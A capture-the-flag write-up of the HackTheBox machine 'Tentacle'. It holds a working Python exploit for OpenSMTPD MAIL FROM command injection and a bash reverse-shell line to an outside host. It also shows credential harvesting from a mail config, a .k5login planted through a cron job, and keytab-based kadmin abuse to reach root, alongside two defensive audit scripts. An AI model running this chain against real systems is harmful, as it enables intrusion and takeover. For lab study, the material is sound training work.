About

Tentacle
IP 10.129.108.83
OS Linux
Difficulty Hard

nmap

└─$ nmap -Pn -sV -sC -p- -oA Tentacle 10.129.109.74 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 05:56 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.36% done
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.44% done; ETC: 07:19 (1:21:08 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:11 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:12 remaining)
Nmap scan report for 10.129.109.74
Host is up (0.81s latency).
Not shown: 65530 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
|   256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_  256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid: 
|_  bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-03-20 10:31:34Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1798.99 seconds

Port 3128

We are met with an error page stating the following:

ERROR
The requested URL could not be retrieved

The following error was encountered while trying to retrieve the URL: /
    *Invalid URL*

Some aspect of the requested URL is incorrect.

Some possible problems are:
    *Missing or incorrect access protocol (should be "http://" or similar)
    *Missing hostname
    *Illegal double-escape in the URL-Path
    *Illegal character in hostname; underscores are not allowed.

Your cache administrator is j.nakazawa@realcorp.htb.

---

Generated Sat, 20 Mar 2021 10:46:32 GMT by srv01.realcorp.htb (squid/4.11)

From this we gain two pieces of information: the administrator's email address, j.nakazawa@realcorp.htb, which may come in handy later for a login, and the hostname of the server hosting the proxy, srv01.realcorp.htb.

DNS Enumeration

Given we only have domains to work with, we decide to do some DNS enumeration.

dig

❯ dig realcorp.htb

; <<>> DiG 9.10.6 <<>> realcorp.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50617
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;realcorp.htb.			IN	A

;; AUTHORITY SECTION:
.			60	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2021032100 1800 900 604800 86400

;; Query time: 11 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Mar 21 16:44:47 AEDT 2021
;; MSG SIZE  rcvd: 105

gobuster dns

❯ ~ gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     realcorp.htb
[+] Threads:    10
[+] Resolver:   10.10.10.224:53
[+] Show IPs:   true
[+] Timeout:    1s
[+] Wordlist:   Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/04/16 18:50:54 Starting gobuster in DNS enumeration mode
===============================================================
2021/04/16 18:50:56 [-] Unable to validate base domain: realcorp.htb (lookup realcorp.htb on 127.0.0.1:53: no such host)
Found: ns.realcorp.htb [10.197.243.77]
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31] 

DNS enumeration was a success: we have a few subdomains to go through. To make accessing these subdomains and IP addresses easier, we set up proxychains.

proxychains

Setting up the proxychains configuration file as below using the IP addresses we got above:

[ProxyList]
# HTB: tentacle
http   10.10.10.224     3128
http   127.0.0.1        3128
http   10.197.243.77    3128

wpad

Now that we can reach the subdomains found above, we visit wpad.realcorp.htb. For context, WPAD stands for Web Proxy Auto-Discovery Protocol.

From Wikipedia:

The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.

http://wpad.example.com/wpad.dat

Given this, we curl http://wpad.realcorp.htb/wpad.dat through the proxy chain:

$ proxychains curl http://wpad.realcorp.htb/wpad.dat
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.224:3128-<>-127.0.0.1:3128-<>-10.197.243.77:3128-<><>-10.197.243.31:80-<><>-OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT"; 
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT"; 
 
    return "PROXY proxy.realcorp.htb:3128";
}

10.241.251.0

We have already enumerated the 10.197.243.0/24 network, so we take a look at the other range listed in the wpad.dat file, 10.241.251.0/24.

proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24

Which gave us: 10.241.251.113

proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb

SMTP Exploit

Google-fu reveals: https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

import socket, time
import sys
if len(sys.argv) < 4:
    print("usage: getShell.py <host> <port> <command>")
    sys.exit(1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
# Try every address the host resolves to (IPv4 or IPv6) until one connects.
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
# The with-block closes the socket when the SMTP dialogue is finished.
with s:
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
print("Exploited. Check your netcat :D")

Exploit using:

proxychains python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.9/5050 <&1"'

and we get:

$ nc -lvp 5050
Listening on 0.0.0.0 5050
Connection received on 10.10.10.224 49024
bash: cannot set terminal process group (17): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~# 
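As an added defender-side example (not part of this writeup or the linked exploit post), the check below validates SMTP envelope addresses against RFC 5321 mailbox syntax and flags the kind of sender the script above submits; the session transcript is constructed and address literals such as [10.0.0.1] are deliberately not accepted.

```python
import re
# Constructed SMTP session excerpt modelled on this writeup's exploit (not a real capture).
SAMPLE_SESSION = """\
220 smtp.realcorp.htb ESMTP OpenSMTPD
helo test.com
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
RCPT TO:<j.nakazawa@realcorp.htb>
MAIL FROM:<alice@realcorp.htb>
MAIL FROM:<>
"""

# RFC 5321 mailbox syntax: dot-atom or quoted-string local part, then a dotted domain.
_ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
_DOT_ATOM = rf"{_ATEXT}(?:\.{_ATEXT})*"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_MAILBOX = re.compile(rf"^(?:{_DOT_ATOM}|{_QUOTED})@{_LABEL}(?:\.{_LABEL})+$")
_ENVELOPE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<(.*)>", re.IGNORECASE)
SHELL_META = set(";|&`$()<>\r\n ")

def classify_path(path):
    """Return None for a well-formed envelope path, otherwise a short reason string."""
    if path == "":
        return None  # the null reverse path <> is legal in MAIL FROM
    if _MAILBOX.match(path):
        return None
    meta = sorted(c for c in set(path) if c in SHELL_META)
    if meta:
        return f"shell metacharacters {meta!r} in mailbox"
    if "@" not in path:
        return "mailbox without a domain part"
    return "mailbox does not match RFC 5321 syntax"

def scan_session(text):
    """Return (line_no, verb, mailbox, reason) for each envelope command that fails validation."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = _ENVELOPE.match(line)
        if m:
            reason = classify_path(m.group(2))
            if reason:
                findings.append((n, m.group(1).upper(), m.group(2), reason))
    return findings

if __name__ == "__main__":
    for n, verb, mailbox, reason in scan_session(SAMPLE_SESSION):
        print(f"line {n}: {verb} <{mailbox}>: {reason}")
```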

SMTP to User

We go to the home directory of our user, j.nakazawa:

root@smtp:/home/j.nakazawa# ls -la
ls -la
total 16
drwxr-xr-x. 1 j.nakazawa j.nakazawa   59 Dec  9 12:31 .
drwxr-xr-x. 1 root       root         24 Dec  8 10:56 ..
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa  220 Apr 18  2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 3526 Apr 18  2019 .bashrc
-rw-------. 1 j.nakazawa j.nakazawa  476 Dec  8 19:12 .msmtprc
-rw-r--r--. 1 j.nakazawa j.nakazawa  807 Apr 18  2019 .profile
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .viminfo -> /dev/null
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth           on
tls            on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile        /dev/null

# RealCorp Mail
account        realcorp
host           127.0.0.1
port           587
from           j.nakazawa@realcorp.htb
user           j.nakazawa
password       sJB}RM>6Z~64_
tls_fingerprint	C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

Unfortunately for us, the above credentials do not work directly over SSH.

We need to obtain a Kerberos ticket in order to log in as j.nakazawa.

Kerberos

  1. Installation:

    sudo apt install krb5-user

  2. Modify /etc/hosts:

    10.10.10.224 srv01.realcorp.htb

  3. Modify /etc/krb5.conf:

    [libdefaults]
        default_realm = REALCORP.HTB

    [realms]
        REALCORP.HTB = {
            kdc = 10.10.10.224
        }

  4. Ticket generation, use sJB}RM>6Z~64_ as the password:

    kinit j.nakazawa

  5. Login:

    ssh j.nakazawa@10.10.10.224

user.txt

[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
c78abea6075164605c634d08c460bf2c

User to Admin

Through basic enumeration we come across the following:

[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

Viewing the log_backup.sh:

[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

This script runs every minute as admin and copies everything from /var/log/squid into /home/admin. Whilst we cannot read /var/log/squid directly, we can write a file into that directory, and the cron job will then copy it into /home/admin. A .k5login file in a home directory lists the Kerberos principals allowed to log in as that account, so placing one that names our own principal there gives us admin's account.

cd /tmp
vim .k5login
j.nakazawa@REALCORP.HTB
:wq
cp .k5login /var/log/squid

Once the cron job has copied the file, we are able to log in as admin: ssh admin@srv01.realcorp.htb
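An added example, not from the writeup: a Python audit of the conditions that make this cron job dangerous, run on a constructed directory layout (the 0o1733 mode on the log directory is an assumption standing in for whatever the real box uses), together with the allow-list selection of only the two files the backup actually needs.

```python
import os
import stat
import tempfile
from pathlib import Path

# Files whose mere presence in a home directory grants login as that user (Kerberos .k5login).
TRUST_FILES = {".k5login"}
# The two files the cron job actually tars up; everything else is an unnecessary copy.
NEEDED_LOGS = ("access.log", "cache.log")

def writable_by_others(path):
    """True if group or other can create files in the directory (the planting precondition)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_copy_job(src, dst, home_root):
    """Report the conditions that let an unprivileged user turn a copy job into a login as dst's owner."""
    findings = []
    if writable_by_others(src):
        findings.append("source writable by group/other: any local user can plant files")
    if Path(dst).resolve().parent == Path(home_root).resolve():
        findings.append("destination is a login home directory")
    for name in sorted(set(os.listdir(src)) & TRUST_FILES):
        findings.append(f"{name} in source would land in {dst} and grant Kerberos login as its owner")
    return findings

def select_for_backup(src, wanted=NEEDED_LOGS):
    """Allow-list copy: only the named log files, never dotfiles or anything else a user planted."""
    return [name for name in wanted if os.path.isfile(os.path.join(src, name))]

def build_demo():
    """Constructed layout mirroring the writeup: a writable log dir, a home dir, a planted .k5login."""
    root = tempfile.mkdtemp(prefix="tentacle-demo-")
    src = os.path.join(root, "var", "log", "squid")
    dst = os.path.join(root, "home", "admin")
    os.makedirs(src)
    os.makedirs(dst)
    os.chmod(src, 0o1733)  # assumption: writable but not listable by others, as the writeup implies
    Path(src, ".k5login").write_text("j.nakazawa@REALCORP.HTB\n")
    Path(src, "access.log").write_text("constructed squid access log line\n")
    return src, dst, os.path.dirname(dst)

if __name__ == "__main__":
    src, dst, home = build_demo()
    for finding in audit_copy_job(src, dst, home):
        print("finding:", finding)
    print("safe copy set:", select_for_backup(src))
```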

Admin to Root

The host keytab is readable by admin and holds keys for the kadmin/admin principal, so we can authenticate to kadmin with it, create a principal for root, and switch to root with ksu:

[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB
kadmin:  add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB": 
Re-enter password for principal "root@REALCORP.HTB": 
Principal "root@REALCORP.HTB" created.
[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged 
         in remotely using an unsecure (non-encrypted) channel. 
Kerberos password for root@REALCORP.HTB: : 
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
[Last failed login: Sat Jan 30 15:25:07 GMT 2021 from 10.10.14.128 on ssh:notty]
[There was 1 failed login attempt since the last successful login.]
Changing uid to root (0)
[root@srv01 admin]# whoami && cat /root/root.txt
root
3b69371ab6b9677313f9ac1fe2c8c7d8